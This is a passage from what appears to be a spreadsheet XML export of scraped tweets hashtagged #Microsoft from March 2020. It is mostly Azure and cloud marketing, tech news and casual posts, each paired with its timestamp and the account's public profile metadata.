    <t>Americans are suspicious of #Facebook (72%) and want #Google and #YouTube separated (51%), but we trust #Microsoft (75%) and #Amazon (73%). @TheVerge https://t.co/PWkmlRTEs1</t>
  </si>
  <si>
    <t>{'id': 948708249909547008, 'id_str': '948708249909547008', 'name': 'Dagesh', 'screen_name': 'bathokma', 'location': 'TX', 'description': 'Listening for the daughter of the voice. ðŸ¦‹', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 107, 'listed_count': 0, 'created_at': 'Thu Jan 04 00:10:47 +0000 2018', 'favourites_count': 1198, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 346,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'http://pbs.twimg.com/profile_images/1181761981038116864/7oIuzKKV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1181761981038116864/7oIuzKKV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/948708249909547008/1530040913',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</si>
  <si>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17:11:06 +0000 2020</t>
  </si>
  <si>
    <t>Do you have a business continuity plan if disaster strikes? Recover seamlessly with cloud technology through #Microsoft #Azure. Let us show you how. https://t.co/OeU4VjpfzV #disasterrecovery #cloudnative https://t.co/H1h5xr195y</t>
  </si>
  <si>
    <t>{'id': 1347232070, 'id_str': '1347232070', 'name': '2nd Watch', 'screen_name': '2ndwatch', 'location': 'Seattle, WA', 'description': 'Enterprise Cloud Solutions', 'url': 'http://t.co/WSb7vOa69I', 'entities': {'url': {'urls': [{'url': 'http://t.co/WSb7vOa69I', 'expanded_url': 'http://www.2ndwatch.com', 'display_url': '2ndwatch.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 837, 'friends_count': 62, 'listed_count': 53, 'created_at': 'Fri Apr 12 16:34:41 +0000 2013', 'favourites_count': 458, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1381,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'http://pbs.twimg.com/profile_images/484090505978867712/wp2l213U_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/484090505978867712/wp2l213U_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1347232070/1578586690',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</si>
  <si>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17:10:02 +0000 2020</t>
  </si>
  <si>
    <t>Azure Red Hat OpenShift 4.3 is now in preview https://t.co/E8nHJhEgVe #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Mon Mar 02 17:09:23 +0000 2020</t>
  </si>
  <si>
    <t>Azure Red Hat OpenShift 4.3 is now in preview: https://t.co/Y6ECYK9FUw #Azure #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 17:08:30 +0000 2020</t>
  </si>
  <si>
    <t>BREAKING NEWS: #Microsoft is retiring 18 certifications and 43 exams in #SQL Server, Windows Server, App Builder, Web Applications and more on 30 June 2020. Our article will tell you what you need to know https://t.co/ZYZqftbnmZ https://t.co/LOphgP01yF</t>
  </si>
  <si>
    <t>Mon Mar 02 17:06:56 +0000 2020</t>
  </si>
  <si>
    <t>This was my match for diamond,so I went balls deep in that building 
#apex #battleroyal #microsoft #xbox #xboxone #ps4 #pc #gamer #gameing #eSports https://t.co/ZNO3lV9kyi</t>
  </si>
  <si>
    <t>Mon Mar 02 17:05:55 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure Red Hat OpenShift 4.3 is now in preview https://t.co/wcnAhH15wB</t>
  </si>
  <si>
    <t>Mon Mar 02 17:05:30 +0000 2020</t>
  </si>
  <si>
    <t>Become a Cyber Security Analyst with DCI at our locations throughout Connecticut! Train for CompTIA, Microsoft and Cisco Certifications! #CompTIA #Cisco #Microsoft #Cyber #Cybersecurity #InfoSec #Jobs #Careers... https://t.co/qmwfKvj1jZ</t>
  </si>
  <si>
    <t>Mon Mar 02 17:05:23 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN IKEv2 load balancing with @CitrixADC. #Microsoft #Windows10 #Win10 #mobility #Citrix #CitrixADC #ADC #NetScaler #aovpn |https://t.co/4h1Ai6qqGg</t>
  </si>
  <si>
    <t>Mon Mar 02 17:05:11 +0000 2020</t>
  </si>
  <si>
    <t>Office 365 and Azure solutions are helping organizations transform their business processes through the use of Azure Active Directory.
Learn more: https://t.co/bUfsfQMZKS
#azure #azureactivedirectory #microsoft #microsoftazure #datalinknetworks https://t.co/BfFb4WzjHm</t>
  </si>
  <si>
    <t>Mon Mar 02 17:05:05 +0000 2020</t>
  </si>
  <si>
    <t>Use the CData #CloudHub to create a virtual SQL Server Database for #GoogleAds data and integrate live Google Ads data into apps built in #Microsoft #PowerApps.
https://t.co/ZEjIubDRMa</t>
  </si>
  <si>
    <t>{'id': 8057152, 'id_str': '8057152', 'name': 'CData Software', 'screen_name': 'cdatasoftware', 'location': 'Research Triangle Park, NC', 'description': 'CData (http://t.co/LFtnfkzq4N) is a leading provider of data integration solutions through driver technologies, like ODBC, JDBC, ADO, SSIS, BizTalk, Excel ...', 'url': 'http://t.co/LFtnfkzq4N', 'entities': {'url': {'urls': [{'url': 'http://t.co/LFtnfkzq4N', 'expanded_url': 'http://www.cdata.com', 'display_url': 'cdata.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/LFtnfkzq4N', 'expanded_url': 'http://www.cdata.com', 'display_url': 'cdata.com', 'indices': [7, 29]}]}}, 'protected': False, 'followers_count': 1252, 'friends_count': 1849, 'listed_count': 123, 'created_at': 'Wed Aug 08 15:32:23 +0000 2007', 'favourites_count': 196, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3486,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'http://pbs.twimg.com/profile_images/938823813197840384/9aqlsxVn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/938823813197840384/9aqlsxVn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/8057152/1510765961', 'profile_link_color': '257AB2',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</si>
  <si>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17:05:01 +0000 2020</t>
  </si>
  <si>
    <t>Apple products outperform whole companies! Solely iPhone sales generated more revenue than the entire Microsoft in 3Q 2019
#apple #microsoft #stockmarket #graphicone https://t.co/64obQGGTQ9</t>
  </si>
  <si>
    <t>{'id': 1169212574270926849, 'id_str': '1169212574270926849', 'name': 'GraphicOne', 'screen_name': 'G1graphs', 'location': '', 'description': 'Visualizing ideas app with hundreds of graphs and charts to add to your constant investment ideas re/search', 'url': 'https://t.co/L8eHcUhHXp', 'entities': {'url': {'urls': [{'url': 'https://t.co/L8eHcUhHXp', 'expanded_url': 'http://graphic.one/', 'display_url': 'graphic.one', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 50, 'listed_count': 0, 'created_at': 'Wed Sep 04 11:36:37 +0000 2019', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 125, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1188820378602393601/HsgV5HxZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1188820378602393601/HsgV5HxZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1169212574270926849/1573219051',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</si>
  <si>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17:04:45 +0000 2020</t>
  </si>
  <si>
    <t>Please register to attend my full day Pre Con on Azure Databricks for SQL Saturday Albany!  Share and like to get the word out please! #databricks #azure #Microsoft #ApacheSpark #datascience 
https://t.co/nlQxZoOwY0</t>
  </si>
  <si>
    <t>{'id': 585266432, 'id_str': '585266432', 'name': 'Bryan Cafferky', 'screen_name': 'BryanCafferky', 'location': 'Greater Boston Area', 'description': 'MVP, Author of Pro PowerShell for Database Developers, decades of IT experience on the MS SQL Server stack, lead The RI MS BI User Group and SNE R User Group.', 'url': 'https://t.co/z4dAkC3d76', 'entities': {'url': {'urls': [{'url': 'https://t.co/z4dAkC3d76', 'expanded_url': 'https://www.linkedin.com/in/bryancafferky/', 'display_url': 'linkedin.com/in/bryancafferâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 382, 'friends_count': 371, 'listed_count': 24, 'created_at': 'Sun May 20 01:48:55 +0000 2012', 'favourites_count': 1476, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1554,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'http://pbs.twimg.com/profile_images/707630721867882496/bFqxRsll_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/707630721867882496/bFqxRsll_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/585266432/1523639033',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</si>
  <si>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17:03:38 +0000 2020</t>
  </si>
  <si>
    <t>#MoonStudios how about don't be rude and give Switch users #oriandthewillofthewisp too? Not everyone is dude-broing their way up #microsoft's butt. Hell, even PS4 will work. Geez. https://t.co/Z7BtufZE1K</t>
  </si>
  <si>
    <t>{'id': 3084648719, 'id_str': '3084648719', 'name': 'Starrianna ð–¤', 'screen_name': 'starriannaisa', 'location': '', 'description': "ðŸŒ’á›á›‡áš«ðŸŒ˜ Darker, my love.ðŸ¥€ðŸ’€ðŸ–¤ @Pokedex_Swain's Empress. âš° Owner of @NoxOccultus. PS4: starriannapanda \nNNID: SW-4605-6349-6011\nâ˜ Laeti vescimur nos subacturis.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 142, 'friends_count': 302, 'listed_count': 10, 'created_at': 'Tue Mar 10 18:56:28 +0000 2015', 'favourites_count': 8425, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5143,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'http://pbs.twimg.com/profile_images/1225283699656118272/Bgx8APVP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225283699656118272/Bgx8APVP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3084648719/1517596881',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</si>
  <si>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17:02:33 +0000 2020</t>
  </si>
  <si>
    <t>Manage and deploy Microsoft 365 Apps from partners in the Microsoft 365 admin center: Since introducing Microsoft 365 Apps at Microsoft Ignite 2019, weve made investments to further enhance the value and the experience for... https://t.co/id5e3FfxYm #Microsoft365 #MEM #Microsoft https://t.co/wwXyPdgQMa</t>
  </si>
  <si>
    <t>{'id': 2716083546, 'id_str': '2716083546', 'name': 'ConfigMgrDogs', 'screen_name': 'ConfigMgrDogs', 'location': 'In the cloud', 'description': 'Matt Shadbolt &amp; Ian Bartlett from the #MSIntune product team, alongside George Smpyrakis from the #Microsoft #Azure team. We are the #ConfigMgrDogs.', 'url': 'https://t.co/dvfyl2Z5Oc', 'entities': {'url': {'urls': [{'url': 'https://t.co/dvfyl2Z5Oc', 'expanded_url': 'https://blogs.technet.microsoft.com/configmgrdogs/', 'display_url': 'blogs.technet.microsoft.com/configmgrdogs/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4880, 'friends_count': 1118, 'listed_count': 95, 'created_at': 'Fri Aug 08 04:08:14 +0000 2014', 'favourites_count': 4858, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4497,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'http://pbs.twimg.com/profile_images/1193988934314807296/7mfweDoF_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193988934314807296/7mfweDoF_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2716083546/1566536272',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</si>
  <si>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17:02:08 +0000 2020</t>
  </si>
  <si>
    <t>How does The Portal Connector differ from Microsoft Power Apps Portals? Glad you asked! Check out this Comparison Chart to find the Portal that is right for your Business - https://t.co/6qV5wlINTo
#PowerApps #PowerAppsPortals #Microsoft #MSDynamics #MSDyn365 #Portals #WebPortal https://t.co/fZluMN0dF5</t>
  </si>
  <si>
    <t>Mon Mar 02 17:02:06 +0000 2020</t>
  </si>
  <si>
    <t>Stocks partially reverse last weeks slide in early-morning trading https://t.co/Z9GpJbIl4v #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 17:01:23 +0000 2020</t>
  </si>
  <si>
    <t>SMBs are hungry for #tech that brings customer data together and helps drive #DigitalTransformation. More, via @smbgroup    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/7Ub3LoUyd6</t>
  </si>
  <si>
    <t>Mon Mar 02 17:01:14 +0000 2020</t>
  </si>
  <si>
    <t>How a connected #Microsoft #Azure ecosystem helps Ignition Ai compete with blazing-fast real-time analytics and built-in #security. https://t.co/R5IEfP4Tou</t>
  </si>
  <si>
    <t>Mon Mar 02 17:01:04 +0000 2020</t>
  </si>
  <si>
    <t>We automated a partner #sales attribution system to reduce errors &amp;amp; speed the compilation of data. https://t.co/apWDE9Afkt #powerBI #microsoft #powerapps #data #AI #azure #pageloading #bigdata #dataanalytics #ml #datascience #datamanagement #IoT #analytics #cloud https://t.co/NVN4pTvBij</t>
  </si>
  <si>
    <t>{'id': 34031107, 'id_str': '34031107', 'name': 'MAQ Software', 'screen_name': 'maqsoftware', 'location': 'Redmond, Hyderabad, Mumbai', 'description': 'Building future-ready solutions for data management, artificial intelligence, Power BI, cloud transformation, and more. \n#AI #dataanalysis #cloud #powerbi', 'url': 'https://t.co/u8S1yJAlff', 'entities': {'url': {'urls': [{'url': 'https://t.co/u8S1yJAlff', 'expanded_url': 'http://maqsoftware.com', 'display_url': 'maqsoftware.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 865, 'friends_count': 531, 'listed_count': 21, 'created_at': 'Tue Apr 21 20:33:15 +0000 2009', 'favourites_count': 418, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1761,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'http://pbs.twimg.com/profile_images/894402636618661888/toidoViR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/894402636618661888/toidoViR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/34031107/1554492992', 'profile_link_color': '990000',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</si>
  <si>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17:01:03 +0000 2020</t>
  </si>
  <si>
    <t>This day in 1993, Diamond Dash - DOS version released. (United States) @MSDOS #Microsoft #oldschool #retro #RETROGAMING https://t.co/yjAQNM3oAw</t>
  </si>
  <si>
    <t>Mon Mar 02 17:00:41 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft     85% of supporters say they're more likely to support a nonprofit if it shows how it is using tech to run its programs in a better way. Download "Beyond overhead" brought to you by @msftnonprofits, to read the survey results. https://t.co/hUrfMTdLLO</t>
  </si>
  <si>
    <t>Mon Mar 02 17:00:15 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/FR8SODSLje</t>
  </si>
  <si>
    <t>Mon Mar 02 17:00:09 +0000 2020</t>
  </si>
  <si>
    <t>Manual management of #Office365 involves time-consuming, error-prone processes that compromise #ITsecurity and compliance efforts. We'll show three ways to streamline the management of your hybrid #Microsoft environment. Register now: https://t.co/EAFgTg0f8z #SysAdmin #HybridIT</t>
  </si>
  <si>
    <t>{'id': 1416346256, 'id_str': '1416346256', 'name': 'Cayosoft', 'screen_name': 'Cayosoft', 'location': 'Westerville, OH', 'description': '', 'url': 'https://t.co/oNNqDJqExn', 'entities': {'url': {'urls': [{'url': 'https://t.co/oNNqDJqExn', 'expanded_url': 'http://www.cayosoft.com', 'display_url': 'cayosoft.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 45, 'friends_count': 56, 'listed_count': 9, 'created_at': 'Thu May 09 19:59:42 +0000 2013', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 756,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'http://pbs.twimg.com/profile_images/935497085624967169/qVAg8niJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/935497085624967169/qVAg8niJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1416346256/1511875651',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</si>
  <si>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16:56:10 +0000 2020</t>
  </si>
  <si>
    <t>Looks like this year #Xing (#German alternative to LinkedIn) is finally losing relevance. #LinkedIn is getting too strong with #Microsoft behind it, adding new features constantly like GitHub is too.
Oh well, fine with me. Never been a big Xing fan.</t>
  </si>
  <si>
    <t>{'id': 8721292, 'id_str': '8721292', 'name': 'Mark Kretschmann', 'screen_name': 'mark_k', 'location': 'Germany', 'description': 'Qt Programmer. Amarok founder. KDE member', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 360, 'friends_count': 253, 'listed_count': 20, 'created_at': 'Fri Sep 07 10:56:30 +0000 2007', 'favourites_count': 156, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6791,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'http://pbs.twimg.com/profile_images/54498273/markey_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/54498273/markey_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/8721292/1562057141',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</si>
  <si>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Mon Mar 02 16:52:16 +0000 2020</t>
  </si>
  <si>
    <t>I want to fuck with a woman. I probably got sick #New York City   #instagram #microsoft https://t.co/s9TUEQ0Z0D</t>
  </si>
  <si>
    <t>{'id': 1234502642375778306, 'id_str': '1234502642375778306', 'name': 'Karla Helland', 'screen_name': 'memilgendjack', 'location': 'Omaha, USA', 'description': 'If I know what love is, it is because of you.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 32, 'listed_count': 0, 'created_at': 'Mon Mar 02 15:35:47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'http://pbs.twimg.com/profile_images/1234518496538759168/0lgwy8kn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234518496538759168/0lgwy8kn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234502642375778306/1583167162',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</si>
  <si>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16:51:35 +0000 2020</t>
  </si>
  <si>
    <t>"Why #AzureSphere From #Microsoft Is A Big Deal For The #IoT Ecosystem"
=&amp;gt; Good overview from #Forbes about the #Azure #cloud IoT #strategy...
From the article:
"The weakest link in the IoT chain is the device security...
Azure...https://t.co/vwNmjzwQTC https://t.co/fYzaYGrb0x</t>
  </si>
  <si>
    <t>Mon Mar 02 16:50:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft investing Over $1 Billion in Mexico
https://t.co/mGD2rKwtjt
#CIO #Cloud
@digitalcloudgal @sarbjeetjohal @alcgroup @imoyse @shanebrighton @avrohomg @DrJDrooghaag @sallyeaves @fklivestolearn @junjudapi @AlaricAloor @archonsec @fogle_shane @gvalan @reach2ratan @PVynckier https://t.co/CMm6BM29Nd</t>
  </si>
  <si>
    <t>{'id': 4764183104, 'id_str': '4764183104', 'name': 'Fawad Khan', 'screen_name': 'DigitalFawad', 'location': 'Seattle, WA', 'description': '#Cloud #CloudComputing #Leadership #CTO #CIO #DigitalTransformation #Strategy #Training #ML #AI #IoT #Influencer #Author #Speaker Blog: https://t.co/19k99nPAVe', 'url': 'https://t.co/ITNOFkDKCs', 'entities': {'url': {'urls': [{'url': 'https://t.co/ITNOFkDKCs', 'expanded_url': 'https://www.linkedin.com/in/fawadakhan1/', 'display_url': 'linkedin.com/in/fawadakhan1/', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/19k99nPAVe', 'expanded_url': 'http://digitalfawad.com', 'display_url': 'digitalfawad.com', 'indices': [136, 159]}]}}, 'protected': False, 'followers_count': 6388, 'friends_count': 3536, 'listed_count': 96, 'created_at': 'Fri Jan 15 18:59:00 +0000 2016', 'favourites_count': 16640, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13598,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'http://pbs.twimg.com/profile_images/788389378288603136/_TT6zG4s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/788389378288603136/_TT6zG4s_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4764183104/1576213184',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</si>
  <si>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16:50:04 +0000 2020</t>
  </si>
  <si>
    <t>How to Setup AirPods on a Windows 10 Computer! https://t.co/woX2cfdfgS  #AirPods #AirPod #airpods #Windows #Windows10 #windows #Microsoft #AirPods2 #Tutorial #tutorial #technology</t>
  </si>
  <si>
    <t>Mon Mar 02 16:50:02 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 16:48:59 +0000 2020</t>
  </si>
  <si>
    <t>Codec were delighted to host a breakfast briefing Securing the Modern Workplace Breakfast Briefing recently. The event was a great success with many interesting topics covered. Check out our latest blog post to find out all about it.  https://t.co/XpJg7DlZVg #Codec #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1725697074, 'id_str': '1725697074', 'name': 'Codec Ireland', 'screen_name': 'CodecIreland', 'location': 'Head Office: Dublin, Ireland', 'description': 'Codec is an Irish, full-stack IT solutions consultancy headquartered in Dublin with offices in Cork, Galway, Belfast, London, Cologne and Warsaw.', 'url': 'https://t.co/oZZHwsGstK', 'entities': {'url': {'urls': [{'url': 'https://t.co/oZZHwsGstK', 'expanded_url': 'http://www.codec.ie', 'display_url': 'codec.ie', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 615, 'friends_count': 1066, 'listed_count': 68, 'created_at': 'Tue Sep 03 14:46:32 +0000 2013', 'favourites_count': 864, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1485, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0D4E78', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1068478553984024576/I1DF4kOz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1068478553984024576/I1DF4kOz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1725697074/1545216374', 'profile_link_color': '003764', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 16:47:51 +0000 2020</t>
  </si>
  <si>
    <t>Want a heartwarming story about #technological #innovation? Meet #ProjectToyko, a #Microsoft initiative using #AI that allows blind people to recognize familiar faces in a room. Read about how this project takes technology to the next level. https://t.co/agFSPyxUop</t>
  </si>
  <si>
    <t>Mon Mar 02 16:45:13 +0000 2020</t>
  </si>
  <si>
    <t>Enhance Your #Microsoft #Outlook Experience with These 10 Tips &amp;amp; Tricks https://t.co/GInSC1OCLe</t>
  </si>
  <si>
    <t>Mon Mar 02 16:44:14 +0000 2020</t>
  </si>
  <si>
    <t>When 40% of an airline's operating budget is devoted to fuel, the smallest savings amounts to tens of millions of dollars. See how advanced analytics in #Microsoft #Azure IoT suite helps Rolls Royce. #gotoeis #EISITConsulting https://t.co/2jwiaNe5mT</t>
  </si>
  <si>
    <t>{'id': 267211496, 'id_str': '267211496', 'name': 'Exodus Integrity Services', 'screen_name': 'EISTechRecruit', 'location': 'Willoughby, Ohio ', 'description': 'Since 1997, we are known as strategic consulting and staffing specialists that bring people, companies, and technologies together in the Cleveland, OH area.', 'url': 'http://t.co/M1zlwcbqnZ', 'entities': {'url': {'urls': [{'url': 'http://t.co/M1zlwcbqnZ', 'expanded_url': 'http://www.gotoeisinc.com', 'display_url': 'gotoeisinc.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 235, 'listed_count': 16, 'created_at': 'Wed Mar 16 14:29:47 +0000 2011', 'favourites_count': 27, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 690, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '020E12', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1011636775129927680/N_R4mRQO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1011636775129927680/N_R4mRQO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/267211496/1423071362',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</si>
  <si>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Mon Mar 02 16:40:51 +0000 2020</t>
  </si>
  <si>
    <t>Welcome to #Azure #Arc | #Microsoft #MicrosoftAzure #SystematikaDistributionItalia #SysLearning #SysteAcademy #MagazziniErre #SystematikaDistribution @Azure @Microsoft @SystematikaITA  https://t.co/XaGVLnzvBV https://t.co/W1eh55CfqA</t>
  </si>
  <si>
    <t>{'id': 75542227, 'id_str': '75542227', 'name': 'Valentino Erre', 'screen_name': 'MagazziniErrE', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 157, 'friends_count': 253, 'listed_count': 27, 'created_at': 'Sat Sep 19 12:51:30 +0000 2009', 'favourites_count': 88, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2361,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'http://pbs.twimg.com/profile_images/1059006857237463040/ToTIWxRU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1059006857237463040/ToTIWxRU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/75542227/1456648661',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</si>
  <si>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16:40:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Edge #Addons Store now has more than 1,000 extensions https://t.co/PJw249BW05</t>
  </si>
  <si>
    <t>Mon Mar 02 16:37:07 +0000 2020</t>
  </si>
  <si>
    <t>For this weeks tip we show you how to enable two-factor verification on your Microsoft products.  Learn more on today's blog.
https://t.co/FTHpkt7EHN
#twofactorauthentication #security #microsoft #tips #itsupport #itsupportwestpalmbeach #itsupportpalmbeachgardens</t>
  </si>
  <si>
    <t>{'id': 65122248, 'id_str': '65122248', 'name': 'PC Network Solutions', 'screen_name': 'PCNetworked', 'location': 'Palm Beach Gardens, Florida', 'description': 'PC Network Solutions, provides Managed IT Services, IT Support and IT Consulting in West Palm Beach, Boca Raton and South Florida.', 'url': 'https://t.co/pRun5i1pLt', 'entities': {'url': {'urls': [{'url': 'https://t.co/pRun5i1pLt', 'expanded_url': 'https://www.pcnetworked.com', 'display_url': 'pcnetworked.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1012, 'friends_count': 1647, 'listed_count': 14, 'created_at': 'Wed Aug 12 18:50:51 +0000 2009', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2027,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'http://pbs.twimg.com/profile_images/707559851568795648/H4slAecr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/707559851568795648/H4slAecr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/65122248/1398948776', 'profile_link_color': '093F9C', 'profile_sidebar_border_color': '0084B4', 'profile_sidebar_fill_color': '9AE4E8', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 16:36:12 +0000 2020</t>
  </si>
  <si>
    <t>Why Migrate to #Microsoft #Azure after end of support?
https://t.co/frJjacvrPY https://t.co/8WVI1rTHR3</t>
  </si>
  <si>
    <t>{'id': 138943667, 'id_str': '138943667', 'name': 'TEKPROS', 'screen_name': 'tekprosinc', 'location': 'Dallas, Texas USA', 'description': 'Azure Transformation, Migration, Optimization and Managed Services: Microsoft Cloud Solution Provider(CSP)', 'url': 'http://t.co/5WQY9gm9Am', 'entities': {'url': {'urls': [{'url': 'http://t.co/5WQY9gm9Am', 'expanded_url': 'http://www.tekpros.com', 'display_url': 'tekpros.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 118, 'friends_count': 1240, 'listed_count': 4, 'created_at': 'Sat May 01 02:51:49 +0000 2010', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 478,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'http://pbs.twimg.com/profile_images/1100672410754240512/UtK38GrU_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1100672410754240512/UtK38GrU_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/138943667/1578395516',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</si>
  <si>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16:35:36 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Ventures, Honeywell in talks to invest $40 million in software startup FarEye.
#Microsoft #Honeywell #Softwarecompany #Startup #FarEye #TechNews #ITNews #NewsAlert</t>
  </si>
  <si>
